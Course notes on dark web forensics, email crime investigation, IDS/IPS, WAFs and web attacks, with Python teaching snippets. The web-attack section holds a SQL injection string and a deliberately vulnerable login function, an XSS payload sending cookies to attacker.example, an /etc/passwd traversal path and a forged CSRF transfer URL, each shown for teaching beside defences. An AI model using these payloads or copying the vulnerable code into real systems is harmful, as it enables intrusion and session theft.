Unit 5 - Notes

INT250

Unit 5: Dark Web Forensics, Investigating Email Crimes and Web Attacks

1. Understanding the Dark Web

The internet is conceptually divided into three layers, often visualized as an iceberg:

  1. Surface Web: The portion of the internet indexed by standard search engines (Google, Bing). It is commonly estimated to make up only about 4-10% of the web.
  2. Deep Web: Content not indexed by search engines. This includes medical records, subscription-based content, academic databases, and government reports. It is accessible via standard browsers but requires login credentials or direct links.
  3. Dark Web: A subset of the Deep Web that is intentionally hidden and requires specific software, configurations, or authorization to access.

1.1 Architecture of the Dark Web

The most common Dark Web network is Tor (The Onion Router).

  • Onion Routing: Traffic is wrapped in multiple layers of encryption (like an onion). Data passes through a series of network nodes (relays).
  • Entry Guard: The entry point into the Tor network; knows the user's IP but not the destination.
  • Middle Relay: Passes encrypted data from the guard to the exit; knows neither the source nor the destination, and cannot read the content.
  • Exit Relay: Decrypts the final layer and sends data to the destination; knows the destination but not the source IP.
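The layering described above can be illustrated with a toy sketch. This is not Tor's actual cryptography: the SHA-256-based XOR keystream, the fixed relay keys, and the function names are all assumptions chosen so the example runs on the standard library alone.

```python
import hashlib

def keystream(key: bytes, length: int) -> bytes:
    """Derive a repeatable byte stream from a key (toy construction, not secure)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]

def xor_layer(data: bytes, key: bytes) -> bytes:
    """Add or remove one layer; XOR with the same keystream is its own inverse."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))

# Hypothetical keys the client shares with each hop.
GUARD_KEY, MIDDLE_KEY, EXIT_KEY = b"guard", b"middle", b"exit"

def client_wrap(message: bytes) -> bytes:
    """The client applies the exit layer first and the guard layer last."""
    cell = xor_layer(message, EXIT_KEY)
    cell = xor_layer(cell, MIDDLE_KEY)
    return xor_layer(cell, GUARD_KEY)

message = b"GET /index.html"
cell = client_wrap(message)
after_guard = xor_layer(cell, GUARD_KEY)            # guard removes its layer
after_middle = xor_layer(after_guard, MIDDLE_KEY)   # middle removes its layer
at_exit = xor_layer(after_middle, EXIT_KEY)         # exit recovers the request
```

Only `at_exit` equals the original message; the guard and middle relays see data that is still encrypted. Because XOR layers commute, this toy does not enforce the peeling order the way a real cipher would.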

Other Dark Nets:

  • I2P (Invisible Internet Project): Focuses on hidden services and peer-to-peer communication.
  • Freenet: A decentralized data storage network.

1.2 Dark Web Forensics

Dark Web Forensics involves the identification, preservation, and analysis of data related to criminal activities on dark networks (e.g., drug trafficking, weapons sales, illicit pornography).

Key Forensic Artifacts on a Suspect's Machine:

  • Tor Browser Artifacts: Tor Browser is based on Firefox, so Firefox-related artifacts apply (places.sqlite, cookies.sqlite). However, Tor Browser runs in "Private Browsing" mode by default, minimizing disk writes, so these databases often hold little or no history.
  • RAM Analysis: Because Tor minimizes disk artifacts, capturing live memory (RAM) is crucial to recovering browsing history, encryption keys, and active connections.
  • Prefetch Files: Windows .pf files can prove that the Tor Browser executable was run.
  • Registry Keys: UserAssist keys can show execution history of Tor software.
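If a places.sqlite file is recovered, its history table can be read with a few lines of Python. The following is a minimal sketch, assuming the standard Firefox `moz_places` table and its `url`, `title`, and `last_visit_date` columns; the function names are hypothetical, and the examiner should work on a copy of the evidence file.

```python
import sqlite3
from datetime import datetime, timezone

def open_read_only(path: str) -> sqlite3.Connection:
    """Open a copy of the evidence database read-only so it is not modified."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)

def read_history(conn: sqlite3.Connection):
    """Return (url, title, last_visit_utc) tuples, oldest visit first."""
    rows = conn.execute(
        "SELECT url, title, last_visit_date FROM moz_places "
        "WHERE last_visit_date IS NOT NULL ORDER BY last_visit_date"
    ).fetchall()
    results = []
    for url, title, micros in rows:
        # Firefox stores visit times as microseconds since the Unix epoch.
        visited = datetime.fromtimestamp(micros / 1_000_000, tz=timezone.utc)
        results.append((url, title, visited))
    return results
```

An empty result does not prove that no browsing occurred, since Private Browsing mode avoids writing history in the first place.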

2. Understanding Email Basics

Email is one of the most common vectors for cybercrime. Understanding its underlying architecture is essential for tracing sources.

2.1 Email Architecture

  • MUA (Mail User Agent): The email client used by the end-user (e.g., Outlook, Thunderbird, Webmail).
  • MSA (Mail Submission Agent): Receives mail from the MUA and checks for errors before passing it to the MTA.
  • MTA (Mail Transfer Agent): The server software that transfers emails between computers (e.g., Postfix, Sendmail). It uses DNS to find the recipient's mail server.
  • MDA (Mail Delivery Agent): Receives the mail from the MTA and stores it in the user's mailbox.
  • MRA (Mail Retrieval Agent): Fetches mail from the remote server to the MUA (via POP/IMAP).

2.2 Protocols

  • SMTP (Simple Mail Transfer Protocol): Port 25 (relay between servers) and 587 (submission from client to server). Used for sending email from client to server and between servers.
  • POP3 (Post Office Protocol v3): Port 110 (plain) and 995 (over SSL/TLS). Used for retrieving email. It typically downloads email to the local device and deletes it from the server.
  • IMAP (Internet Message Access Protocol): Port 143 (plain) and 993 (over SSL/TLS). Used for retrieving email. It synchronizes email across multiple devices, leaving the mail on the server.

2.3 Structure of an Email

  1. Header: Contains metadata (Sender IP, Route, Timestamp, Message-ID). This is the most critical part for forensics.
  2. Body: The actual content (Text/HTML).
  3. Attachments: Files encoded (usually Base64) within the message.
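The three parts can be separated with Python's standard `email` package. This is a minimal sketch: the sample message, addresses, and the `summarize` helper are made up for illustration.

```python
from email import message_from_string
from email.message import EmailMessage

# Build a small sample message so the sketch is self-contained.
sample = EmailMessage()
sample["From"] = "alice@example.com"
sample["To"] = "bob@example.com"
sample["Subject"] = "Invoice"
sample["Message-ID"] = "<1234@example.com>"
sample.set_content("Please see the attached file.")
sample.add_attachment(b"hello", maintype="application",
                      subtype="octet-stream", filename="invoice.bin")
raw = sample.as_string()  # the attachment appears Base64-encoded in this text

def summarize(raw_message: str):
    """Split a raw message into headers, plain-text body, and attachments."""
    msg = message_from_string(raw_message)
    headers = dict(msg.items())
    body = None
    attachments = []
    for part in msg.walk():
        if part.is_multipart():
            continue  # containers hold no content of their own
        filename = part.get_filename()
        if filename:
            # decode=True reverses the Base64 transfer encoding.
            attachments.append((filename, part.get_payload(decode=True)))
        elif part.get_content_type() == "text/plain" and body is None:
            charset = part.get_content_charset() or "utf-8"
            body = part.get_payload(decode=True).decode(charset)
    return headers, body, attachments

headers, body, attachments = summarize(raw)
```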

3. Email Crime Investigation and its Steps

Email crimes include phishing, BEC (Business Email Compromise), spamming, cyberstalking, and malware distribution.

3.1 Key Investigation Steps

Step 1: Acquisition and Preservation

  • Secure the victim's device or access to the email account.
  • Do not simply "forward" the suspicious email to the investigator, as this alters the header information.
  • Export the email as an .eml or .msg file to preserve original headers and attachments.

Step 2: Email Header Analysis

The header is the "digital fingerprint" of the email.

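  • Message-ID: A unique string generated by the sending client or its first mail server.
  • Received: Read from bottom to top. Each server that handles the message adds a new line at the top, so the lines trace the path the email took from sender to recipient.
    • Bottom-most "Received": Usually indicates the originating IP address, although lines added before the first trusted server can be forged by the sender.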
  • Return-Path: The address where bounce messages are sent.
  • X-Mailer: Identifies the software used to send the mail (can indicate automated spam tools).
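The bottom-to-top reading of the Received lines can be sketched as follows. The sample headers, host names, and IP addresses are invented (documentation ranges), and the regular expression only handles the common bracketed IPv4 form.

```python
import re
from email import message_from_string

RAW_EMAIL = """\
Received: from mx.recipient.example (mx.recipient.example [192.0.2.10])
    by mailbox.recipient.example with ESMTP id A1; Mon, 01 Jan 2024 10:00:05 +0000
Received: from relay.sender.example (relay.sender.example [198.51.100.20])
    by mx.recipient.example with ESMTP id B2; Mon, 01 Jan 2024 10:00:03 +0000
Received: from laptop.local (unknown [203.0.113.7])
    by relay.sender.example with ESMTPSA id C3; Mon, 01 Jan 2024 10:00:01 +0000
Return-Path: <bounce@sender.example>
Message-ID: <1234@sender.example>
X-Mailer: ExampleMailer 1.0
From: sender@sender.example
To: victim@recipient.example
Subject: Urgent

Body text.
"""

IP_IN_BRACKETS = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")

def trace_route(raw_message: str):
    """Return the bracketed IP of each hop, oldest hop (bottom line) first."""
    msg = message_from_string(raw_message)
    received = msg.get_all("Received", [])
    hops = []
    for line in reversed(received):  # bottom-most header is the first hop
        match = IP_IN_BRACKETS.search(line)
        if match:
            hops.append(match.group(1))
    return hops

msg = message_from_string(RAW_EMAIL)
route = trace_route(RAW_EMAIL)
origin_ip = route[0] if route else None
```

Here `origin_ip` is only a candidate for the sender's address; it still has to be checked against server logs because the lowest lines can be forged.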

Step 3: Validation (Anti-Spoofing Checks)

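Investigators check the results of three mechanisms, which the receiving server usually records in the Authentication-Results header, to verify whether the sender is legitimate or spoofed:

  1. SPF (Sender Policy Framework): Verifies whether the sending IP is authorized by the domain's administrators, who publish the list of permitted senders in DNS.
  2. DKIM (DomainKeys Identified Mail): A cryptographic signature verifying that the signed headers and body were not altered in transit and that the signing domain takes responsibility for the message.
  3. DMARC (Domain-based Message Authentication, Reporting and Conformance): A policy published by the sender's domain that tells receivers what to do (none, quarantine, or reject) when a message passes neither SPF nor DKIM in alignment with the From domain.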
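The verdicts a receiving server recorded can be pulled out of the Authentication-Results header with a simple pattern. This is a rough sketch: the header value is an invented example and `auth_results` is a hypothetical helper, not a full parser for the header's grammar.

```python
import re

# Invented example of what a receiving server might record for a spoofed message.
AUTH_HEADER = (
    "mx.recipient.example; spf=fail smtp.mailfrom=bank.example; "
    "dkim=none; dmarc=fail header.from=bank.example"
)

def auth_results(header_value: str) -> dict:
    """Map each mechanism (spf, dkim, dmarc) to its recorded result."""
    pairs = re.findall(r"\b(spf|dkim|dmarc)=(\w+)", header_value, re.IGNORECASE)
    return {method.lower(): result.lower() for method, result in pairs}

results = auth_results(AUTH_HEADER)
# Treat the message as suspicious unless DMARC explicitly passed.
suspicious = results.get("dmarc") != "pass"
```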

Step 4: Tracing the IP Address

  • Extract the originating IP from the "Received" header.
  • Use Whois lookup tools to identify the ISP (Internet Service Provider) owning that IP.
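  • Use GeoIP tools to estimate the geographic region of the sender. The result is approximate and may point to a VPN, proxy, or Tor exit relay rather than the actual sender.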
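Before running Whois or GeoIP lookups, it helps to discard addresses that cannot be attributed to an ISP, such as private, loopback, or reserved ranges. A minimal sketch using the standard `ipaddress` module follows; the `traceable` helper name is an assumption.

```python
import ipaddress

def traceable(candidates):
    """Keep only syntactically valid, globally routable IP addresses."""
    result = []
    for text in candidates:
        try:
            ip = ipaddress.ip_address(text)
        except ValueError:
            continue  # not an IP address at all
        if ip.is_global:
            result.append(str(ip))
    return result

extracted = ["10.0.0.5", "127.0.0.1", "8.8.8.8", "not-an-ip", "192.168.1.20"]
worth_looking_up = traceable(extracted)
```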

Step 5: Server Log Analysis

  • If the investigator has access to the server, they analyze SMTP logs to correlate the Message-ID with specific user login times and IP addresses.
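The correlation can be sketched as a two-pass search over the log. The log lines below are hypothetical and simplified in a Postfix-like style; real formats vary by server and configuration, so the patterns would need adjusting for actual evidence.

```python
import re

# Hypothetical, simplified Postfix-style log lines.
LOG = """\
Jan  1 10:00:01 mail postfix/smtpd[2101]: 4F2A1C: client=unknown[198.51.100.7], sasl_method=PLAIN, sasl_username=alice
Jan  1 10:00:01 mail postfix/cleanup[2102]: 4F2A1C: message-id=<1234@example.com>
Jan  1 10:00:09 mail postfix/smtpd[2103]: 7B3D2E: client=unknown[192.0.2.44], sasl_method=PLAIN, sasl_username=bob
Jan  1 10:00:09 mail postfix/cleanup[2104]: 7B3D2E: message-id=<5678@example.com>
"""

def correlate(log_text: str, message_id: str):
    """Find the queue ID for a Message-ID, then the login that submitted it."""
    lines = log_text.splitlines()
    queue_id = None
    for line in lines:
        m = re.search(r": (\w+): message-id=(\S+)", line)
        if m and m.group(2) == message_id:
            queue_id = m.group(1)
            break
    if queue_id is None:
        return None
    pattern = re.compile(
        rf": {re.escape(queue_id)}: client=\S*\[([\d.]+)\].*sasl_username=(\S+)"
    )
    for line in lines:
        m = pattern.search(line)
        if m:
            return {
                "queue_id": queue_id,
                "timestamp": line[:15],  # syslog-style "Mon DD HH:MM:SS"
                "client_ip": m.group(1),
                "user": m.group(2),
            }
    return None

hit = correlate(LOG, "<1234@example.com>")
```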

4. Intrusion Detection System (IDS)

An IDS is a monitoring tool that acts like a burglar alarm. It inspects network traffic or system logs for suspicious activity and issues alerts.

4.1 Classifications of IDS

  1. NIDS (Network Intrusion Detection System):
    • Placed at strategic points within the network (e.g., behind the firewall).
    • Monitors traffic (packets) for the whole subnet.
    • Example: Snort, Zeek.
  2. HIDS (Host Intrusion Detection System):
    • Installed on individual hosts (servers/workstations).
    • Monitors file integrity, system logs, and configuration changes.
    • Example: OSSEC, Wazuh.

4.2 Detection Methodologies

  • Signature-Based (Misuse Detection): Compares traffic against a database of known attack signatures.
    • Pros: High accuracy for known attacks.
    • Cons: Cannot detect zero-day (new) attacks.
  • Anomaly-Based (Behavioral): Establishes a "baseline" of normal traffic. Anything deviating significantly from the baseline is flagged.
    • Pros: Can detect new/unknown attacks.
    • Cons: Higher rate of False Positives.
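The two methodologies can be contrasted in a short sketch. The signature list, the requests-per-minute baseline, and the three-standard-deviation threshold are illustrative assumptions, not values taken from any real IDS.

```python
import statistics

# Hypothetical signature database of known-bad substrings.
SIGNATURES = ["' OR '1'='1", "<script>", "../"]

def signature_alert(payload: str):
    """Signature-based: report every known pattern found in the payload."""
    lowered = payload.lower()
    return [sig for sig in SIGNATURES if sig.lower() in lowered]

def anomaly_alert(baseline, observed, threshold=3.0):
    """Anomaly-based: flag values far from the baseline mean."""
    mean = statistics.mean(baseline)
    stdev = statistics.stdev(baseline)
    return abs(observed - mean) > threshold * stdev

# Requests per minute observed during normal operation (made-up numbers).
normal_traffic = [100, 110, 95, 105, 98, 102]
```

`signature_alert` misses anything not in its list, which mirrors the zero-day limitation, while `anomaly_alert` will also flag a legitimate traffic spike, which mirrors the false-positive problem.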

5. Intrusion Prevention System (IPS)

While an IDS is passive (alerts only), an IPS is active. It sits in-line with the traffic flow and can stop an attack in real-time.

5.1 Functionality

  • Prevention: If an IPS detects a malicious packet, it can drop the packet, reset the connection, or block the IP address automatically.
  • Placement: Must be placed in-line (between the outside world and the internal network) to effectively block traffic.

5.2 Differences: IDS vs. IPS

Feature           | IDS (Intrusion Detection System)       | IPS (Intrusion Prevention System)
------------------|----------------------------------------|----------------------------------------------------
Action            | Passive (Monitoring & Alerting)        | Active (Control & Blocking)
Placement         | Promiscuous mode (copy of traffic)     | In-line (traffic flows through it)
Impact on Network | No latency added                       | Can introduce latency
Risk              | No risk of blocking legitimate traffic | Risk of blocking legitimate traffic (False Positive)

6. Web Application Firewall (WAF)

Traditional network firewalls (Packet Filters) operate at Layer 3 (Network) and Layer 4 (Transport). They cannot inspect the content of a web request. A WAF operates at Layer 7 (Application Layer).

6.1 Role of WAF

  • It serves as a shield between a web application and the Internet.
  • It protects against specific web attacks such as SQL injection, Cross-Site Scripting (XSS), and file inclusion.
  • It inspects HTTP/HTTPS traffic specifically.
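A WAF's Layer 7 inspection can be sketched as decoding the request and matching its parameters against rules. The three patterns below are deliberately simplistic assumptions; production rule sets (such as those used with ModSecurity) are far more extensive.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Hypothetical, deliberately simple rules keyed by attack category.
RULES = {
    "sql_injection": re.compile(r"('|\")\s*or\s+.+=", re.IGNORECASE),
    "xss": re.compile(r"<\s*script", re.IGNORECASE),
    "file_inclusion": re.compile(r"\.\./|^(https?|file)://", re.IGNORECASE),
}

def inspect(url: str):
    """Return the sorted names of rules matched by any query parameter value."""
    hits = set()
    # parse_qsl percent-decodes values, so encoded payloads are inspected too.
    for _, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for name, pattern in RULES.items():
            if pattern.search(value):
                hits.add(name)
    return sorted(hits)

def decide(url: str) -> str:
    """Block the request if any rule matched, otherwise let it through."""
    return "block" if inspect(url) else "allow"
```

A packet filter working at Layers 3 and 4 never sees the decoded parameter values that this check relies on.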

6.2 Deployment Models

  • Network-based WAF: Hardware appliance installed locally.
  • Host-based WAF: Software installed on the web server itself (e.g., ModSecurity).
  • Cloud-based WAF: Traffic is redirected through a third-party cloud provider (e.g., Cloudflare, AWS WAF) before reaching the server.

7. Attacks on Web Applications

Web applications are high-value targets because they are accessible 24/7 and often connect to sensitive databases.

7.1 SQL Injection (SQLi)

  • Concept: The attacker injects malicious SQL commands into input fields (like login forms or search bars) to manipulate the backend database.
  • Goal: Bypass authentication, access sensitive data, modify data, or delete tables.
  • Example: Entering ' OR '1'='1 in a password field to trick the database into evaluating the condition as true.
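The effect of the payload can be reproduced with an in-memory SQLite database. This is a minimal sketch: the `users` table, the plaintext password, and both login functions are invented for the demonstration (real systems should store password hashes).

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

def login_vulnerable(name: str, password: str):
    """Builds the query by string concatenation, so input can change its logic."""
    query = (
        f"SELECT name FROM users WHERE name = '{name}' "
        f"AND password = '{password}'"
    )
    return conn.execute(query).fetchall()

def login_safe(name: str, password: str):
    """Uses placeholders, so input is always treated as data, never as SQL."""
    return conn.execute(
        "SELECT name FROM users WHERE name = ? AND password = ?",
        (name, password),
    ).fetchall()

payload = "' OR '1'='1"
bypassed = login_vulnerable("alice", payload)  # WHERE ... OR '1'='1' is always true
rejected = login_safe("alice", payload)        # no user has this literal password
```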

7.2 Cross-Site Scripting (XSS)

  • Concept: The attacker injects malicious client-side scripts (usually JavaScript) into web pages viewed by other users.
  • Types:
    • Stored XSS: The malicious script is saved on the server (e.g., in a forum post).
    • Reflected XSS: The script is embedded in a request (typically a crafted link); the server echoes it back in its response, and it executes in the victim's browser when they click the link.
  • Goal: Steal session cookies (Session Hijacking), redirect users to phishing sites.
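Why injected markup executes, and how output encoding neutralizes it, can be shown with the standard `html` module. The two render functions and the attacker URL are hypothetical.

```python
import html

def render_comment_unsafe(comment: str) -> str:
    """Inserts user input into the page verbatim, so script tags stay live."""
    return f"<p>{comment}</p>"

def render_comment_safe(comment: str) -> str:
    """Escapes <, >, &, and quotes so the browser displays the text instead."""
    return f"<p>{html.escape(comment)}</p>"

payload = (
    "<script>document.location="
    "'http://attacker.example/?c='+document.cookie</script>"
)
unsafe_page = render_comment_unsafe(payload)
safe_page = render_comment_safe(payload)
```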

7.3 Cross-Site Request Forgery (CSRF)

  • Concept: An attacker tricks an authenticated user into executing unwanted actions on a web application in which they are currently logged in.
  • Example: A user is logged into their bank. They click a malicious link in a separate tab that secretly sends a request to bank.com/transfer?amount=1000&to=attacker. Because the user is logged in, the browser sends the valid session cookie, and the bank processes the transfer.
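The forged request succeeds because the session cookie alone authorizes it. One common countermeasure, sketched here under the assumption of a dictionary-like server-side session, is a per-session secret token that the attacker's page cannot read; the function names are hypothetical.

```python
import hmac
import secrets

def issue_token(session: dict) -> str:
    """Create a random token, store it in the session, and embed it in forms."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token

def is_request_allowed(session: dict, submitted_token) -> bool:
    """Accept a state-changing request only if it carries the session's token."""
    expected = session.get("csrf_token")
    if not expected or not submitted_token:
        return False
    # Constant-time comparison avoids leaking the token through timing.
    return hmac.compare_digest(expected, submitted_token)

session = {}
form_token = issue_token(session)
```

A request triggered from the attacker's link still carries the cookie but not `form_token`, so `is_request_allowed` returns False for it.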

7.4 Denial of Service (DoS) and DDoS

  • DoS: Flooding a server with traffic to exhaust resources (CPU, RAM, Bandwidth) so legitimate users cannot access it.
  • DDoS (Distributed DoS): Using a botnet (network of infected zombie computers) to launch a DoS attack from thousands of IPs simultaneously.

7.5 Directory Traversal (Path Traversal)

  • Concept: Manipulating variables that reference files with "dot-dot-slash" (../) sequences.
  • Goal: To access files and directories that are stored outside the web root folder.
  • Example: Supplying ../../../../etc/passwd as the value of a file parameter (for instance a hypothetical http://website.com/view?file=../../../../etc/passwd) to read Linux system user files.
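The check that defeats "../" sequences is to normalize the requested path and confirm it still lies under the web root. This is a minimal sketch with a hypothetical `WEB_ROOT`; it works on path strings only and does not resolve symbolic links.

```python
import posixpath

WEB_ROOT = "/var/www/html"  # hypothetical web root

def resolve(user_path: str):
    """Return the normalized path if it stays inside WEB_ROOT, else None."""
    # normpath collapses "../" segments; join discards WEB_ROOT if
    # user_path is absolute, which the prefix check below also catches.
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, user_path))
    if candidate == WEB_ROOT or candidate.startswith(WEB_ROOT + "/"):
        return candidate
    return None
```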